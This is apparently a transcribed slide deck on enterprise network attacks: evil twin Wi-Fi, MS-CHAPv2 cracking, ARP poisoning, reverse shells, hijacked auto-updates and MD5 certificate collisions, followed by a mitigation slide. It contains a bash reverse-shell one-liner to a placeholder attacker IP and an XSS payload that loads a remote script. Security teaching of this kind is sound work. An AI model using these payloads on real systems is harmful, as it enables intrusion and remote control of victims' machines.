Breaking Bad: Enterprise Network Security

Post on 13-Apr-2017

43 views 0 download

Preview:

Click to see full reader
Report this document
SHARE

Transcript of Breaking Bad: Enterprise Network Security

Enterprise Network Security

Navneet Kumar

Overview

• Demo• OSI Protocols Overview• Evil Twin Attack• Cryptanalysis : MS-CHAPv2• ARP poisoning• POST-MITM Attack vectors• Reverse Shell• Mitigations• Certificate Collision Attack

Note: Some Images in this presentation has been taken from web for illustration

SilverFish Worm

XSS

NPAPI runtime

Shell

<img src='a' onerror=eval(atob('JC5'))> = $.getScript('https://goo.gl/zByVrM')

masterPlugin.updatePlugin(“attacker-plugin”,success,failure)

Netcat Shell / ssh daemon / Bounjour

Hatching rate = ng

n=Average # of endpoints per meetingg=# of generation

g=0

g=1

g=2

802.11

ARP

Target Protocols

Attack Vectors

802.11

Evil twin attack

Fake Certificate Exchange

Soft AP

• Put WNIC in Master Mode and use Forged CA cert• Configure AP SSID to “bjn-int”• DAUTH to actual AP

Network

• Setup DNS• Setup DHCP

Routing

• Redirect 80,443 packets to proxy port• Forward traffic after NAT

Capture

• Use Same CA cert for signing• Sniff in proxy

Attack Setup

Note: Chrome uses certificate pinning for *.google.com

Fake BSSID

Highest Strength2.4 GHz Channel

Wireless Scan

Victim’s Client

WTF !!!

Certificate Forgery

Soft AP DHCP

Routing Proxy

Cryptanalysis of MS-CHAPv2

ChallengeHash = SHA1(random|| username)[0:8]

ChallengeHash

ChallengeResponse

Note: Original complexity analysis has been done by Moxie Marlinspike

Cryptanalysis of MS-CHAPv2

Note: Original complexity analysis has been done by Moxie Marlinspike

7 byte 7 byte 2 byte

Complexity = 256

time < 24 hrs ( 100% success )

ARP poisoning

POST-MITM Attack Vectors

Reverse Shell

Bind Shell

Session Hijacking

Above L3 Attacks

Reverse Bind Shell

• Give a network shell to attacker• Works Behind NAT• Gets Root Access

HOW ????

$ bash -i >& /dev/tcp/<attacker-ip>/5555 0>&1

https://tools.google.com/service/update2

https://swdl.bluejeans.com

https://aus4.mozilla.org/update/*/update.xml

smb://MVAV01/SophosUpdate

(Auto)Updates

Depl

oy P

aylo

ad w

ith u

pdat

es

Mitigation

Pre-deployment of enterprise wide CA

SSL Cert Pinning for updates

Proper WIPS Configuration

Arp Spoof Mitigations

Careful CA signing

Certificate Collision Attack

CADomainA

isCA?

CSR Ekey[Sha(csr.tbs)]

DomainAisCA?

DomainAisCA?

CertificateCSR.TBS

Sha( domainA.csr ) Sha( domainB.csr )

md5( domainA.csr )

md5( domainB.csr )

True

False

MD5 CollisionCertificate Collision

Top related

Breaking Bad EACS Implementations
 Technology
Breaking bad powerpoint
 Education
BREAKING BAD NEWS_REFLECTION
 Documents
Breaking bad news - communicating with the cancer patientonkologia.cm-uj.krakow.pl/cm/uploads/2017/02/Breaking-bad-news.pdf · Breaking bad news Problems The „cancer stigma” -
 Documents
Breaking Bad Backlinks
 Small Business & Entrepreneurship
Breaking Bad - Portfólio
 Internet
Breaking Bad – Pornography
 Documents
Breaking Bad News Regional Guidelines · PDF filebreaking bad news breaking bad new breaking bad newsbreaking bad news breaking bad news bad news breaking bad new ccoonntteennttss
 Documents
1386381883 breaking bad
 Documents
Breaking Bad Guion
 Documents
1386393410 breaking bad
 Documents
Breaking Bad UX
 Design
Análisis Breaking Bad
 Documents
Breaking Bad News
 Documents
Breaking Bad #PrograTele2015
 Education
Breaking Bad News 1
 Documents
Infografía Breaking Bad
 Documents
Breaking Bad News BBN
 Documents
Breaking Bad CSP
 Documents
TOI Breaking Bad News
 Documents

Copyright © 2022 FDOCUMENTS